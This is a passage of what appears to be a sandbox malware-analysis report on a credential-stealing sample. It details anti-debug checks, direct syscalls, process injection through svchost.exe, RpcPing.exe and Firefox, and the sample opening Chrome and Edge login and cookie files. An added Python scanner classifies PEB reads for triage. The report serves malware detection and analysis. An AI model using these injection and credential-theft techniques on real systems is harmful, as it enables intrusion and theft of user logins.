            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034D483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034FA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346C8F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03430887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034BC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h] (4 occurrences)
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_0041F250 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
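            The `mov eax, dword ptr fs:[00000030h]` entries above are loads of the PEB pointer: on 32-bit Windows the fs segment base is the TEB, and offset 0x30 in the TEB holds the address of the PEB. A PEB load on its own is not evidence of anything (the CRT reads PEB.ProcessHeap at +0x18 for GetProcessHeap, and shellcode-style API resolution walks PEB.Ldr at +0x0C); what makes the pattern an anti-debug indicator is the field dereferenced next, PEB.BeingDebugged at +0x02 or PEB.NtGlobalFlag at +0x68. The following script is an added example, not part of the Joe Sandbox report or of the sample: it finds the PEB-load encodings in raw x86 code bytes and classifies the field the next instruction reads. The byte buffer is constructed for illustration; the field offsets are those of the 32-bit PEB. It is a linear byte scan, not a disassembler, so a 0x64 byte inside another instruction's operand can produce a false prefix match; treat hits as triage leads.

```python
# Added example (not from the Joe Sandbox report): recognise the x86 PEB-load
# pattern listed in the report ("mov eax, dword ptr fs:[00000030h]") in raw
# code bytes and classify what the following instruction reads from the PEB.
from typing import List, Optional, Tuple

# Register number as encoded in the ModRM reg/rm fields (esp=4 omitted: as a
# base it needs a SIB byte, which this small decoder does not handle).
REG_NAME = {0: "eax", 1: "ecx", 2: "edx", 3: "ebx", 5: "ebp", 6: "esi", 7: "edi"}
REG_NUM = {name: num for num, name in REG_NAME.items()}

# 32-bit PEB offsets (x86 layout; the x64 PEB uses different offsets).
PEB_FIELDS = {
    0x02: ("BeingDebugged", "anti-debug"),
    0x0C: ("Ldr", "module/API resolution"),
    0x18: ("ProcessHeap", "benign (what GetProcessHeap reads)"),
    0x68: ("NtGlobalFlag", "anti-debug"),
}

FS30 = b"\x30\x00\x00\x00"  # disp32 = 0x30: the PEB pointer inside the TEB


def find_peb_loads(code: bytes) -> List[Tuple[int, str, int]]:
    """Return (offset, register, offset_of_next_insn) for every mov r32, fs:[30h].

    Two encodings are recognised: 64 A1 <disp32> (mov eax, moffs32) and
    64 8B <modrm> <disp32> with mod=00, rm=101 (any r32, absolute disp32).
    """
    hits = []
    i = 0
    while i < len(code):
        if code[i] == 0x64:  # FS segment override prefix
            if code[i + 1:i + 6] == b"\xA1" + FS30:
                hits.append((i, "eax", i + 6))
                i += 6
                continue
            if i + 7 <= len(code) and code[i + 1] == 0x8B:
                modrm = code[i + 2]
                if (modrm & 0xC7) == 0x05 and code[i + 3:i + 7] == FS30:
                    reg = (modrm >> 3) & 7
                    if reg in REG_NAME:
                        hits.append((i, REG_NAME[reg], i + 7))
                        i += 7
                        continue
        i += 1
    return hits


def peb_field_read(code: bytes, pos: int, base: str) -> Optional[int]:
    """If the instruction at pos reads [base + disp8], return disp8, else None.

    Handles 'mov r32, [base+disp8]' (8B /r) and 'movzx r32, byte ptr [base+disp8]'
    (0F B6 /r); both carry ModRM mod=01 with rm=base.
    """
    want = 0x40 | REG_NUM[base]
    if code[pos:pos + 2] == b"\x0F\xB6" and pos + 4 <= len(code):
        modrm, disp = code[pos + 2], code[pos + 3]
        if (modrm & 0xC7) == want:
            return disp
    if pos + 3 <= len(code) and code[pos] == 0x8B:
        modrm, disp = code[pos + 1], code[pos + 2]
        if (modrm & 0xC7) == want:
            return disp
    return None


def scan(code: bytes) -> List[dict]:
    """Pair every PEB load with the PEB field the next instruction dereferences."""
    findings = []
    for off, reg, nxt in find_peb_loads(code):
        disp = peb_field_read(code, nxt, reg)
        name, verdict = PEB_FIELDS.get(disp, ("unknown", "needs manual review"))
        findings.append({"offset": off, "reg": reg, "field": name,
                         "disp": disp, "verdict": verdict})
    return findings


# Constructed code bytes (not taken from the sample): four PEB loads, two of
# which are the classic anti-debug reads, one API-resolution read, one benign.
SAMPLE = bytes.fromhex(
    "55 8B EC "                # push ebp; mov ebp, esp
    "64 A1 30 00 00 00 "       # mov eax, fs:[30h]            -> PEB
    "0F B6 40 02 "             # movzx eax, byte ptr [eax+2]  -> PEB.BeingDebugged
    "85 C0 75 05 "             # test eax, eax; jnz ...
    "64 8B 0D 30 00 00 00 "    # mov ecx, fs:[30h]
    "8B 41 68 "                # mov eax, [ecx+68h]           -> PEB.NtGlobalFlag
    "25 70 00 00 00 "          # and eax, 70h (heap debug flags)
    "64 8B 15 30 00 00 00 "    # mov edx, fs:[30h]
    "8B 52 0C "                # mov edx, [edx+0Ch]           -> PEB.Ldr
    "64 A1 30 00 00 00 "       # mov eax, fs:[30h]
    "8B 40 18 "                # mov eax, [eax+18h]           -> PEB.ProcessHeap
    "C3"                       # ret
)

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f"+0x{f['offset']:04x} mov {f['reg']}, fs:[30h] ; "
              f"then reads PEB.{f['field']} -> {f['verdict']}")
```

            Run against a dumped code section (for instance the svchost.exe region the report addresses 0x0342xxxx to 0x0350xxxx fall in) the same scan tells you which of the functions listed above are worth opening first: the ones whose follow-up read lands on BeingDebugged or NtGlobalFlag, not the ones that just fetch the process heap.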

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtProtectVirtualMemory: Direct from: 0x77542F9C
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtSetInformationProcess: Direct from: 0x77542C5C
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtOpenKeyEx: Direct from: 0x77542B9C
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtProtectVirtualMemory: Direct from: 0x77537B2E
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtCreateFile: Direct from: 0x77542FEC
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtOpenFile: Direct from: 0x77542DCC
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtQueryInformationToken: Direct from: 0x77542CAC
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtTerminateThread: Direct from: 0x77542FCC
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtDeviceIoControlFile: Direct from: 0x77542AEC
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtAllocateVirtualMemory: Direct from: 0x77542BEC
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtQueryVolumeInformationFile: Direct from: 0x77542F2C
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtOpenSection: Direct from: 0x77542E0C
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtAllocateVirtualMemory: Direct from: 0x775448EC
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtSetInformationThread: Direct from: 0x775363F9
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtQuerySystemInformation: Direct from: 0x775448CC
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtClose: Direct from: 0x77542B6C
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtReadVirtualMemory: Direct from: 0x77542E8C
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtCreateKey: Direct from: 0x77542C6C
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtSetInformationThread: Direct from: 0x77542B4C
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtQueryAttributesFile: Direct from: 0x77542E6C
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtAllocateVirtualMemory: Direct from: 0x77543C9C
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtCreateUserProcess: Direct from: 0x7754371C
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtQueryInformationProcess: Direct from: 0x77542C26
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtResumeThread: Direct from: 0x77542FBC
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtWriteVirtualMemory: Direct from: 0x7754490C
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtDelayExecution: Direct from: 0x77542DDC
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtAllocateVirtualMemory: Direct from: 0x77542BFC
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtReadFile: Direct from: 0x77542ADC
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtQuerySystemInformation: Direct from: 0x77542DFC
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtResumeThread: Direct from: 0x775436AC
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtNotifyChangeKey: Direct from: 0x77543C2C
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtCreateMutant: Direct from: 0x775435CC
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtWriteVirtualMemory: Direct from: 0x77542E3C
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe NtMapViewOfSection: Direct from: 0x77542D1C
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\RpcPing.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: NULL target: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe protection: read write
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: NULL target: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RpcPing.exe Thread register set: target process: 6424
            Source: C:\Windows\SysWOW64\RpcPing.exeThread APC queued: target process: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeJump to behavior
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 29EA008Jump to behavior
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\N2Qncau2rN.exe"Jump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeProcess created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: auuGcaPMTDojV.exe, 00000003.00000000.1802688702.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000003.00000002.4128448538.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000000.1954851803.00000000011C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: N2Qncau2rN.exe, auuGcaPMTDojV.exe, 00000003.00000000.1802688702.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000003.00000002.4128448538.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000000.1954851803.00000000011C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: auuGcaPMTDojV.exe, 00000003.00000000.1802688702.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000003.00000002.4128448538.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000000.1954851803.00000000011C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: auuGcaPMTDojV.exe, 00000003.00000000.1802688702.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000003.00000002.4128448538.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000000.1954851803.00000000011C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: N2Qncau2rN.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1888404688.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1886252240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4131107461.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4122907990.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4126780482.0000000002730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1888965861.0000000006200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\RpcPing.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: N2Qncau2rN.exe | Binary or memory string: WIN_XP
Source: N2Qncau2rN.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: N2Qncau2rN.exe | Binary or memory string: WIN_XPe
Source: N2Qncau2rN.exe | Binary or memory string: WIN_VISTA
Source: N2Qncau2rN.exe | Binary or memory string: WIN_7
Source: N2Qncau2rN.exe | Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1888404688.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1886252240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4131107461.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4122907990.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4126780482.0000000002730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1888965861.0000000006200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
MITRE ATT&CK Matrix

The matrix is listed here per tactic column; the number in parentheses is the count the report attaches to a matched technique, and entries without a number are the matrix's unmatched placeholders.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (16); Security Software Discovery (141); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1529035, Sample: N2Qncau2rN.exe, Startdate: 08/10/2024, Architecture: WINDOWS, Score: 100), rendered as text:

